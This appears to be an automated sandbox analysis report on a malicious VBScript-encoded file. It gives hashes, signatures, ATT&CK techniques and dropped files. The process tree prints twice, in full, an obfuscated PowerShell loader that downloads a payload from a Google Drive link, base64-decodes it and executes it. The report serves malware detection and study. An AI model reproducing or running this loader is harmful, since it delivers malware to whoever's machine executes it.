Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 01:20

General

  • Target

    383045b66fe2c7bc0329fe7c671ab1b7d6c2a5334530f4972e0a364a2382c9f3.vbe

  • Size

    5KB

  • MD5

    ee79e648e91b1ce814880ccde05bc2f5

  • SHA1

    7b42afec990d74d33d650d4d82b85057f30fad0c

  • SHA256

    383045b66fe2c7bc0329fe7c671ab1b7d6c2a5334530f4972e0a364a2382c9f3

  • SHA512

    769dae3c283203508d24e1edf4b4619498db1af9f2ca90dedbbf538ec15d5ff9d25a912a1c12221dc6cef3af1d41051bd15fea827f310aaacc2554d220ae3ad8

  • SSDEEP

    96:Q1k8HdF1YeCbuTUtYX3Mu0sTwsZ0pstwIjzSv+vvddxDpE5IHf0d21XmwDCToWHO:QHHj0tQ3z0sZwstwIjzyYvddxDa5IHfL

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\383045b66fe2c7bc0329fe7c671ab1b7d6c2a5334530f4972e0a364a2382c9f3.vbe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Cuarenta = 1;$Snerydde='Sub';$Snerydde+='strin';$Snerydde+='g';Function Sydslesvigsk($Khalifs){$Unspared98=$Khalifs.Length-$Cuarenta;For($Telefonisterne=1;$Telefonisterne -lt $Unspared98;$Telefonisterne+=2){$Unsurmounted+=$Khalifs.$Snerydde.Invoke( $Telefonisterne, $Cuarenta);}$Unsurmounted;}function brndforgiftnings($Baccar50){& ($Naturfredningsforenings) ($Baccar50);}$Gesneriaceae=Sydslesvigsk ' M oKzFiHl lMa /S5 .C0P .(QWJiHnCdaocwYs NBT 1S0,.P0S;. WFi,n 6C4 ;M Gx 6 4 ;C Ir.vP: 1O2R1 . 0G), G e c kSo,/D2 0.1F0P0f1P0P1b fF.i rEeUf,oKx /K1E2A1B.L0M ';$Bagsderyglnet=Sydslesvigsk ' UBs e rN-KATg.epn.tH ';$Interessentselskaber136=Sydslesvigsk '.hOt.t,p,s,:B/C/.dBr.iAvSe ..gSoCo,gVlLe,.,c oTmB/Du c ?ue.x p.oSr.t = dNoMwOnAlSo.a dK&DiLdB=O1U6LUBB L.jUa VBWUQ n 1FXU_ M ITS L,4N9 y a,2 h.KMB e,m jFj,X.SD0 ';$Uskrevet=Sydslesvigsk 'E> ';$Naturfredningsforenings=Sydslesvigsk 'Ri e xe ';$Rottweileren='Spilerens';$Gratias = Sydslesvigsk 'Pe c hAo ,%LaPp p dPa.tAaB%A\ RTu dRk.b.iKnRgae nDsBe rP.FUTdrv & &R .e c h,o. Stp ';brndforgiftnings (Sydslesvigsk ' $ gBl,o,bCa l :RFSi l.t.eNrPpfr.o.gPrCa m m,e tW=S(.c.mSd, /ScL O$DGGr a t iMaTs )V ');brndforgiftnings (Sydslesvigsk ' $VgOlAo.b aRlt:SP,hSa gSe d aXe.nRiBc a l.=E$SIDnJtCe,rLePsSs,eQnBt sKeDlAsKkTa.bOe rF1 3M6,. sEpPl,i.tP(K$IU.sPkSr e vEeLt )L ');$Interessentselskaber136=$Phagedaenical[0];$Cartelize= (Sydslesvigsk 'H$.gSl o b.aOl :,N eBdBk,mSp eId e =,N eKwT- ORb.j e.cNt RS yFsGtSe,mP..N e tH.SWTeGb CHlCiFeAnCt');$Cartelize+=$Filterprogrammet[1];brndforgiftnings ($Cartelize);brndforgiftnings (Sydslesvigsk ' $SN,eLd kSm p e dUe,.KH e a.d eKr,s [.$ B.aNg sedReTr.y,gSlRn,eSt.] = $,G eBs,nFe r iUaMc emaKe ');$Bifangsternes=Sydslesvigsk ' $SN e d k m p eSdAea. DToUwKn.lPo,a dAFEi lRe,( $FI,nStEeGr.e s.sBesnAt,s eFlSs k a bTe.r 1T3I6P,C$MSGuDbOsSt a.l,aSgSmCiCt e,)P ';$Substalagmite=$Filterprogrammet[0];brndforgiftnings (Sydslesvigsk 'P$ng l.o b a lA:PA mSbUu l.o m a n c yL= (PTCe.sBtP- P aCtNhD B$.S.u.bjsHtCaCl aFg.m,i t eD). ');while (!$Ambulomancy) {brndforgiftnings (Sydslesvigsk 'L$SgSlRoSb.a lS:.MDi a =,$AtWr.u eI ') ;brndforgiftnings $Bifangsternes;brndforgiftnings (Sydslesvigsk ' SEt aAr tA-US.l e eBp B4D ');brndforgiftnings (Sydslesvigsk 'M$Mg.l,o,bFaIl,:DAAmDb uVlBo,mOaSn c y,= (FT,eIsmt -.P aCt hP N$ S uUbHs tRaOlNa,g m iMtSe ) ') ;brndforgiftnings (Sydslesvigsk ' $ g lRo b a l : G.aEs e,nM= $ gPlMo b aTl.:MAKc hui nFeBs sF+M+M%V$FP,h.a g.e dTa eNn i.cFa.l,..c oPu nBtR ') ;$Interessentselskaber136=$Phagedaenical[$Gasen];}$aiery=384974;$Clockcase=25303;brndforgiftnings (Sydslesvigsk 'D$Ng l oCbEa,l : OBpFkSr,vpetnVdGe sC = aG eAt -TC oGnHt e n tU .$.S.udb.s t aNlbaUgKmCiLt eT ');brndforgiftnings (Sydslesvigsk 'd$,gFl,oPb a l :AE sAkOa p ils,tAi,s kR .=D U[FSAy,s t eUmG.ICMoAnPvTeLrrt ] :,: F,rFo.mEBdaKsBe 6 4.S t,rPiPn ga(S$POUpRkSrTvPe nJd e s )I ');brndforgiftnings (Sydslesvigsk ',$.gOl oSbKa lL: FFiSsOkDeCp,r oHd,uFk,tSe r sI Y=L ,[.S.yBsStCeBmL.BT.e,x,tS.LE,nOc,oSdDi n gA]O:.: AUS C,I I .BG,e t,S t.r.i,n g (,$NE s kUaOp.i.sStIiOsAk )A ');brndforgiftnings (Sydslesvigsk 'S$AgNlPoDb aGl :TB,e lSi nBeP= $ FFi.sukBeApMr,oHdMu k tUeSr sS.as uLb s t.rPiNnBg (C$DasiMe,rTy ,,$.C,lgo cOkBc a s.eA)C ');brndforgiftnings $Beline;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2644
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rudkbingenser.Udv && echo t"
        3⤵
          PID:2432
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Cuarenta = 1;$Snerydde='Sub';$Snerydde+='strin';$Snerydde+='g';Function Sydslesvigsk($Khalifs){$Unspared98=$Khalifs.Length-$Cuarenta;For($Telefonisterne=1;$Telefonisterne -lt $Unspared98;$Telefonisterne+=2){$Unsurmounted+=$Khalifs.$Snerydde.Invoke( $Telefonisterne, $Cuarenta);}$Unsurmounted;}function brndforgiftnings($Baccar50){& ($Naturfredningsforenings) ($Baccar50);}$Gesneriaceae=Sydslesvigsk ' M oKzFiHl lMa /S5 .C0P .(QWJiHnCdaocwYs NBT 1S0,.P0S;. WFi,n 6C4 ;M Gx 6 4 ;C Ir.vP: 1O2R1 . 0G), G e c kSo,/D2 0.1F0P0f1P0P1b fF.i rEeUf,oKx /K1E2A1B.L0M ';$Bagsderyglnet=Sydslesvigsk ' UBs e rN-KATg.epn.tH ';$Interessentselskaber136=Sydslesvigsk '.hOt.t,p,s,:B/C/.dBr.iAvSe ..gSoCo,gVlLe,.,c oTmB/Du c ?ue.x p.oSr.t = dNoMwOnAlSo.a dK&DiLdB=O1U6LUBB L.jUa VBWUQ n 1FXU_ M ITS L,4N9 y a,2 h.KMB e,m jFj,X.SD0 ';$Uskrevet=Sydslesvigsk 'E> ';$Naturfredningsforenings=Sydslesvigsk 'Ri e xe ';$Rottweileren='Spilerens';$Gratias = Sydslesvigsk 'Pe c hAo ,%LaPp p dPa.tAaB%A\ RTu dRk.b.iKnRgae nDsBe rP.FUTdrv & &R .e c h,o. Stp ';brndforgiftnings (Sydslesvigsk ' $ gBl,o,bCa l :RFSi l.t.eNrPpfr.o.gPrCa m m,e tW=S(.c.mSd, /ScL O$DGGr a t iMaTs )V ');brndforgiftnings (Sydslesvigsk ' $VgOlAo.b aRlt:SP,hSa gSe d aXe.nRiBc a l.=E$SIDnJtCe,rLePsSs,eQnBt sKeDlAsKkTa.bOe rF1 3M6,. sEpPl,i.tP(K$IU.sPkSr e vEeLt )L ');$Interessentselskaber136=$Phagedaenical[0];$Cartelize= (Sydslesvigsk 'H$.gSl o b.aOl :,N eBdBk,mSp eId e =,N eKwT- ORb.j e.cNt RS yFsGtSe,mP..N e tH.SWTeGb CHlCiFeAnCt');$Cartelize+=$Filterprogrammet[1];brndforgiftnings ($Cartelize);brndforgiftnings (Sydslesvigsk ' $SN,eLd kSm p e dUe,.KH e a.d eKr,s [.$ B.aNg sedReTr.y,gSlRn,eSt.] = $,G eBs,nFe r iUaMc emaKe ');$Bifangsternes=Sydslesvigsk ' $SN e d k m p eSdAea. DToUwKn.lPo,a dAFEi lRe,( $FI,nStEeGr.e s.sBesnAt,s eFlSs k a bTe.r 1T3I6P,C$MSGuDbOsSt a.l,aSgSmCiCt e,)P ';$Substalagmite=$Filterprogrammet[0];brndforgiftnings (Sydslesvigsk 'P$ng l.o b a lA:PA mSbUu l.o m a n c yL= (PTCe.sBtP- P aCtNhD B$.S.u.bjsHtCaCl aFg.m,i t eD). ');while (!$Ambulomancy) {brndforgiftnings (Sydslesvigsk 'L$SgSlRoSb.a lS:.MDi a =,$AtWr.u eI ') ;brndforgiftnings $Bifangsternes;brndforgiftnings (Sydslesvigsk ' SEt aAr tA-US.l e eBp B4D ');brndforgiftnings (Sydslesvigsk 'M$Mg.l,o,bFaIl,:DAAmDb uVlBo,mOaSn c y,= (FT,eIsmt -.P aCt hP N$ S uUbHs tRaOlNa,g m iMtSe ) ') ;brndforgiftnings (Sydslesvigsk ' $ g lRo b a l : G.aEs e,nM= $ gPlMo b aTl.:MAKc hui nFeBs sF+M+M%V$FP,h.a g.e dTa eNn i.cFa.l,..c oPu nBtR ') ;$Interessentselskaber136=$Phagedaenical[$Gasen];}$aiery=384974;$Clockcase=25303;brndforgiftnings (Sydslesvigsk 'D$Ng l oCbEa,l : OBpFkSr,vpetnVdGe sC = aG eAt -TC oGnHt e n tU .$.S.udb.s t aNlbaUgKmCiLt eT ');brndforgiftnings (Sydslesvigsk 'd$,gFl,oPb a l :AE sAkOa p ils,tAi,s kR .=D U[FSAy,s t eUmG.ICMoAnPvTeLrrt ] :,: F,rFo.mEBdaKsBe 6 4.S t,rPiPn ga(S$POUpRkSrTvPe nJd e s )I ');brndforgiftnings (Sydslesvigsk ',$.gOl oSbKa lL: FFiSsOkDeCp,r oHd,uFk,tSe r sI Y=L ,[.S.yBsStCeBmL.BT.e,x,tS.LE,nOc,oSdDi n gA]O:.: AUS C,I I .BG,e t,S t.r.i,n g (,$NE s kUaOp.i.sStIiOsAk )A ');brndforgiftnings (Sydslesvigsk 'S$AgNlPoDb aGl :TB,e lSi nBeP= $ FFi.sukBeApMr,oHdMu k tUeSr sS.as uLb s t.rPiNnBg (C$DasiMe,rTy ,,$.C,lgo cOkBc a s.eA)C ');brndforgiftnings $Beline;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2484
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Rudkbingenser.Udv && echo t"
            4⤵
              PID:2836
            • C:\Windows\SysWOW64\wermgr.exe
              "C:\Windows\system32\wermgr.exe" "-outproc" "2484" "1124"
              4⤵
                PID:1948

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Discovery

        System Information Discovery

        1
        T1082

        Command and Control

        Web Service

        1
        T1102

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\OutofProcReport259501762.txt
          Filesize

          1KB

          MD5

          d9de87597f3febdfae9b3ecfa90cd91b

          SHA1

          4a65592f886991d7868263221b73c28e3e2fc84b

          SHA256

          8a154c39325467b0757453ff0d99cdd29789e25c1e6d206d29225386b7e0a363

          SHA512

          e7fc3d76f0e10efb1963943f72dbb7208e5438cbeaf09a8ae04f326ff105fe8d633effb0b7eec6a341ab61384293cdf18cd03d66648afdbd92b0203648b29370

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BUEL19GZG0J4Z4UWQXMC.temp
          Filesize

          7KB

          MD5

          43fbe842f84e0c4740e2c372d570389d

          SHA1

          b76318b706c0863d893a6cfbb108bbcdffec60ca

          SHA256

          07aa467d1aade98aeea7cc10f33edbb5667a5ff6341367c84804b91bda8e2380

          SHA512

          ec8d1889337569f832bbcc9278fc1f3e6325405fc33e27847cebf4d580a400663518d16e5e5f649a05ce44161c4edb07ebdf76de8451bd835491cfab36743c45

        • C:\Users\Admin\AppData\Roaming\Rudkbingenser.Udv
          Filesize

          534KB

          MD5

          9954201e4cf053ed914a27ebc5c0afcb

          SHA1

          c78635b446c8e6ce924f5eb5f186110eba6dbc34

          SHA256

          816ab3bd778e5e1f8aa7d8e225b5de50e977990b2217ba2fe28c0a856ff5a2e1

          SHA512

          cd8574c186fd9d45a7597068b5d66de81843cd9a2c593e5326e19f354f6d94e8739a81a141694d8741730cfb174cee797c316a7326d9bd01218e8c8c0452535d

        • memory/2484-21-0x00000000061C0000-0x00000000084F0000-memory.dmp
          Filesize

          35.2MB

        • memory/2644-7-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
          Filesize

          9.6MB

        • memory/2644-9-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
          Filesize

          9.6MB

        • memory/2644-10-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
          Filesize

          9.6MB

        • memory/2644-11-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
          Filesize

          9.6MB

        • memory/2644-8-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
          Filesize

          9.6MB

        • memory/2644-4-0x000007FEF5B7E000-0x000007FEF5B7F000-memory.dmp
          Filesize

          4KB

        • memory/2644-17-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
          Filesize

          9.6MB

        • memory/2644-18-0x000007FEF5B7E000-0x000007FEF5B7F000-memory.dmp
          Filesize

          4KB

        • memory/2644-6-0x0000000002490000-0x0000000002498000-memory.dmp
          Filesize

          32KB

        • memory/2644-5-0x000000001B120000-0x000000001B402000-memory.dmp
          Filesize

          2.9MB

        • memory/2644-24-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp
          Filesize

          9.6MB